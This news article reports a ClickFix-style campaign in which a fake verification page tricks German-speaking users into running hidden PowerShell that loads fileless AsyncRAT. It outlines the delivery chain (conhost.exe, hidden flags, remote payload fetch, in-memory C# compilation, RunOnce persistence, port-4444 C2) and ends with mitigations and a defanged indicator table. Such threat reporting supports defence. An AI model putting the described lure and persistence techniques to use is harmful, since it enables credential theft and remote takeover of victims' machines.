Threat actors are employing cunning strategies to disseminate a fileless variant of AsyncRAT, a well-known remote access Trojan. This operation was uncovered during a routine analysis of attacker infrastructure, revealing a deceptive mechanism that utilizes a fake verification prompt inspired by the “Clickfix” technique. This tactic is designed to mislead users into executing harmful commands.
The campaign appears to specifically target German-speaking individuals, as indicated by the language used in the prompt. By leveraging obfuscated PowerShell scripts and executing commands in memory, the malware is deployed without ever creating files on disk, presenting a considerable challenge for conventional antivirus solutions.
Deceptive Campaign Targets German-Speaking Users
The attack initiates when victims stumble upon a seemingly benign verification page that prompts them to click “I’m not a robot.” Upon their interaction, a malicious command is surreptitiously copied to their clipboard, accompanied by the German phrase “Drücke enter um deine identität zu bestätigen!” (Press enter to confirm your identity!).
As reported by CloudSEK, this command employs the legitimate Windows utility conhost.exe to initiate a hidden PowerShell instance with flags such as -w hidden and -nop. This instance executes a payload retrieved from a remote server (http://namoet[.]de:80/x).
The script decodes an obfuscated base64 string, establishing a connection to a command-and-control (C2) server located at namoet[.]de:4444. It then compiles reversed C# code in memory using Add-Type. This sophisticated approach ensures persistence through registry keys like HKCU:SOFTWAREMicrosoftWindowsCurrentVersionRunOnce, enabling full remote control, credential theft, and data exfiltration while evading detection by file-based mechanisms.
Sophisticated Fileless Malware
Technical analysis reveals that AsyncRAT employs signature tactics, including the use of PowerShell for stealth execution (MITRE T1059.001), in-memory C# compilation (T1127.001), and TCP-based C2 communication over non-standard ports such as 4444 (T1571). The payload establishes persistence by embedding commands in registry paths and utilizes advanced obfuscation techniques, including reversed strings and reflective loading, to complicate analysis.
Once activated, the malware redirects standard input/output for command execution, allowing attackers to maintain covert access over extended periods. This campaign, which may have been active since at least April 2025 based on associated infrastructure, highlights the increasing sophistication of fileless malware delivery.
To mitigate this threat, organizations should focus on several key strategies: blocking suspicious PowerShell executions through EDR or AppLocker, enforcing network segmentation to filter egress traffic to known C2 domains, and monitoring registry changes for unauthorized persistence mechanisms. Implementing PowerShell Constrained Language Mode and enabling script logging can further assist in detecting obfuscated code, while memory scanning with tailored YARA rules provides a proactive defense against in-memory payloads.
Indicators of Compromise (IOCs)
| Indicator Type | Value | Use |
|---|---|---|
| IP | 109.250.111[.]155 | Clickfix Delivery |
| FQDN | namoet[.]de | Clickfix / C2 Server |
| Port | 4444 | TCP Reverse Shell Listener |
| URL | hxxp[:]//namoet[.]de:80/x | PowerShell Payload |
| Registry (HKCU) | SOFTWAREMicrosoftWindowsCurrentVersionRunOncewindows | Persistence on Boot |
| Registry (HKCU) | SOFTWAREMicrosoftWindows NTCurrentVersionWindowswin | Holds Obfuscated Command |
Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates
